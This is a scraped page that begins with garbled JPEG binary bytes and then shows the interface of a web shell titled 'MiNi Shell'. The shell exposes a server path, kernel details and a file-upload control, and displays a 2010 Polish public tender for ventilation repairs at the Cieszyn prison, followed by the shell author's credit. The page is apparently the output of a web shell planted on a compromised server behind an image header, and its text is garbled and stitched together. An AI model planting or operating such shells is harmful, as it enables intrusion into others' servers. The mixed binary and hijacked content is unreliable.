JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100709/183355-N-2010.html

<p class="kh_header"><b>Cieszyn: Remont wentylacji mechanicznej dla pomieszczeń kuchni w Zakładzie Karnym w Cieszynie</b><br>
<b>Numer ogłoszenia: 183355 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Cieszynie , ul. Chrobrego 2, 43-400 Cieszyn, woj. śląskie, tel. 033 8513220, 8513270, faks 033 8511755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wentylacji mechanicznej dla pomieszczeń kuchni w Zakładzie Karnym w Cieszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie dotyczy wykonania usługi remontowej nawiewnej wentylacji mechanicznej kuchni Zakładu Karnego w Cieszynie
W zakres remontu wchodzi:
1)wymiana centrali nawiewnej oraz niektórych odcinków instalacji kanałowej;
2)zabudowanie kratek wentylacyjnych nawiewnych regulowanych;
3)instalacja zasilania w ciepło sekcji nagrzewnicy w centrali;
4)zasilanie energią elektryczną;
5)zabezpieczenie.

2.Zakres rzeczowy robót przedstawiony został w:
1)projekcie budowlano - wykonawczym remontu wentylacji mechanicznej dla pomieszczeń kuchni w Zakładzie Karnym w Cieszynie autorstwa:
a)branża sanitarna - Edward Nowak, uprawnienia w zakresie inst. sanitarnych
b)branża elektryczna - Zdzisław Mazurek - Inżynier Elektryk - uprawnienia do kierowania, nadzorowania, oceniania i projektowania sieci i instalacji elektrycznych
2)przedmiarze robót 
3)specyfikacji technicznej wykonania i odbioru robót 
które stanowią załączniki do niniejszej SIWZ.

3.Nomenklatura CPV:
1)45000000-7 roboty budowlane
2)45300000-0 roboty instalacyjne w budynkach
3)45331210-1 instalowanie wentylacji
4)45331200-8 instalowanie urządzeń wentylacyjnych
5)45321000-3 izolacja cieplna
6)45310000-3 roboty instalacyjne elektryczne
7)45311000-0 roboty w zakresie okablowania i instalacji elektrycznych
8)45311100-1 roboty w zakresie okablowania elektrycznego
9)45311200-2 roboty w zakresie instalacji elektrycznych

4.Zamawiający zaleca dokonanie wizji lokalnej w budynku przed przystąpieniem do przygotowania oferty.

5.Wymagania dotyczące robót:
1)Wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż, zgodnie z poleceniami inspektora nadzoru.
2)roboty należy prowadzić zgodnie z wymogami dokumentacji określającej przedmiot zamówienia, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz wymogami niniejszej specyfikacji.

6.Wymagania dotyczące materiałów i urządzeń:
1)Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym, posiadające odpowiednie dopuszczenia do stosowania w budownictwie i zapewniające sprawność eksploatacyjną.
2)Wykonawca zobowiązany będzie dostarczyć dokumenty potwierdzające dopuszczenie wbudowanych materiałów do obrotu i powszechnego stosowania w budownictwie najpóźniej wraz z wnioskiem o dokonanie końcowego odbioru robót.
3)Wykonawca zobowiązany jest zagospodarować zbędne demontowane urządzenia.

7.Ustalenia organizacyjne związane z wykonaniem zamówienia:
1)Zadanie realizowane będzie w kolejności wynikającej z technologii robót oraz ustaleń stron, w sposób umożliwiający Zamawiającemu normalne funkcjonowanie jednostki.
2)Wykonawca uczestniczy na bieżąco w koordynacji robót stanowiących przedmiot umowy.
3)Wykonawca ustala z Zamawiającym zasady organizacji ruchu na terenie budowy.
4)Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.

8.Wymagania stawiane Wykonawcy:
1)Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia.
2)Wykonawca zobowiązany jest do zapewnienia sprawnej realizacji przedmiotu umowy, zabezpieczenia odcinka robót z zachowaniem najwyższej staranności dla mienia i osób w obrębie strefy wykonywania robót objętych niniejszą umową.
3)Wykonawca odpowiedzialny jest za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
4)Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia.
5)Sporządzenie planu Bezpieczeństwa i Ochrony Zdrowia.
6)Inne wymagania określone we wzorze umowy oraz wynikające z przepisów prawa.

9.Zamawiający nie dopuszcza powierzenia wykonania zamówienia podwykonawcom.

10.Zamawiający dopuszcza zmiany w umowie w zakresie:
1)osób powołanych do reprezentacji stron. Zmiana ta wymaga pisemnego oświadczenia Wykonawcy lub Zamawiającego.
2)terminu wykonania robót objętych niniejszym postępowaniem, który może ulec zmianie w przypadku wystąpienia robót dodatkowych lub zamiennych, jeżeli ich wykonanie lub zakres uniemożliwią dotrzymanie pierwotnego terminu wykonania zadania.
3)wynikającym z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.

11.Wymagania dotyczące gwarancji:
1)Wykonawca udziela zamawiającemu 36 miesięcznej gwarancji- licząc od daty odbioru końcowego - na roboty wykonane w ramach niniejszej umowy.
2)Na urządzenia zakupione przez Wykonawcę, Wykonawca udziela gwarancji zgodnej z gwarancją jaką dają ich producenci.
3)Odbiorca może korzystać z uprawnień wynikających z rękojmi niezależnie od udzielonej gwarancji.
4)W okresie gwarancji lub rękojmi Wykonawca zobowiązuje się do bezpłatnego usunięcia wad w terminie do 7 dni od powiadomienia go przez Zamawiającego o wadzie, jeżeli będzie to możliwe technicznie lub w innym - uzgodnionym przez strony terminie do usunięcia wad.
5)Zamawiający dokonuje usunięcia wady we własnym zakresie na koszt Wykonawcy w przypadku:
a.bezskutecznego upływu terminu usunięcia wad,
b.pisemnego uzgodnienia pomiędzy Zamawiającym, a Wykonawcą dokonanego w terminie usunięcia wad,
c.bezskutecznego upływu terminu do dokonania uzgodnień, o których mowa w pkt. b)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.12.10-1, 45.33.12.00-8, 45.32.10.00-3, 45.31.00.00-3, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie osobami posiadającymi uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności sanitarnej, elektrycznej oraz budowlanej. Spełnieniem tego warunku będzie złożony wykaz i oświadczenie, których wzór stanowi załącznik nr 4 i 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie osobami posiadającymi uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności sanitarnej, elektrycznej oraz budowlanej. Spełnieniem tego warunku będzie złożony wykaz i oświadczenie, których wzór stanowi załącznik nr 4 i 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku na podstawie oświadczenia Wykonawcy złożonego w załączniku nr 3 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki
1.	Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ;
2.	Parafowany przez Wykonawcę wzór umowy ( na formularzu stanowiącym załącznik nr 2 do SIWZ), co stanowić będzie akceptację jej warunków;
3.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.
4.	Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą całkowitą cenę zamówienia. Wyceny prac należy dokonać przy zastosowaniu określonych w:
a.	dokumentacji projektowej, 
b.	specyfikacji technicznych wykonania i odbioru robót budowlanych,
c.	przedmiarze robót
technologii i materiałów lub technologii i materiałów równoważnych, gwarantujących ten sam efekt użytkowy, techniczny oraz identyczną trwałość i bezpieczeństwo użytkowania. 
Konsekwencje wadliwego opracowania kosztorysu ofertowego, wyłącznie na podstawie dostarczonego przedmiaru i bez uwzględnienia rzeczywistego zakresu robót, wynikającego z dokumentacji projektowej oraz przeprowadzonej wizji lokalnej ponosi Wykonawca robót budowlanych.
5.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności spełniając wymagania art. 22 ust. 1 ustawy z dnia 29 stycznia 2009 r. Prawo Zamówień publicznych oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo Zamówień Publicznych z udziału w postępowaniu o zamówienie publiczne wykonawca składa następujące oświadczenia i dokumenty:
a)	Oświadczenie wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych (na formularzu stanowiącym załącznik nr 3 do SIWZ);
b)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.	W celu potwierdzenia, że Wykonawca ma niezbędną wiedzę oraz doświadczenie, dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty.
1)	Oświadczenie zawarte w załączniku nr 3 do SIWZ.
2)	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - załącznik nr 4.
Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać, że dysponuje osobami posiadającymi uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności sanitarnej, elektrycznej oraz budowlanej.
7.	Oświadczenie że osoby, które będą uczestniczyć w wykonaniu zamówienia, w szczególności wskazane w wykazie osób, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - załącznik nr 5.
B. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej w postępowaniu o zamówienie publiczne składa następujące dokumenty:
a)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt A ppkt. 5 lit. b  składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że oferent jest uprawniony do występowania w obrocie prawnym oraz, że nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert) wraz z tłumaczeniem tychże dokumentów przez tłumacza przysięgłego na język polski.
b)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w pkt. A zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wraz z tłumaczeniem tychże dokumentów przez tłumacza przysięgłego na język polski.
C. Dokumenty wymagane w przypadku składania oferty wspólnej: 
a.	Podmioty występujące wspólnie zobowiązane są do załączenia do oferty umowę regulującą współpracę tych podmiotów.
Umowa musi zawierać:
-	określenie celu gospodarczego,
-	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi,
-	wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia oraz upływu czasu gwarancji i rękojmi,
-	zakaz zmian w umowie bez zgody zamawiającego.
b.	Oferta winna zawierać dokumenty dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.
c.	Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela/partnera wiodącego.
d.	Upoważnienie do pełnienia funkcji przedstawiciela/partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć je do oferty.
e.	Przedstawiciel/wiodący partner winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego i na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu - do oferty należy załączyć oświadczenie.
f.	Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	osób powołanych do reprezentacji stron. Zmiana ta wymaga pisemnego oświadczenia Wykonawcy lub Zamawiającego.
2)	terminu wykonania robót objętych niniejszym postępowaniem, który może ulec zmianie w przypadku wystąpienia robót dodatkowych lub zamiennych, jeżeli ich wykonanie lub zakres uniemożliwią dotrzymanie pierwotnego terminu wykonania zadania.
3)	wynikającym z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Cieszynie ul. B. Chrobrego 2, 43-400 Cieszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 09:00, miejsce: Zakład Karny w Cieszynie - sekretariat
43-400 Cieszyn
ul. B. Chrobrego 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com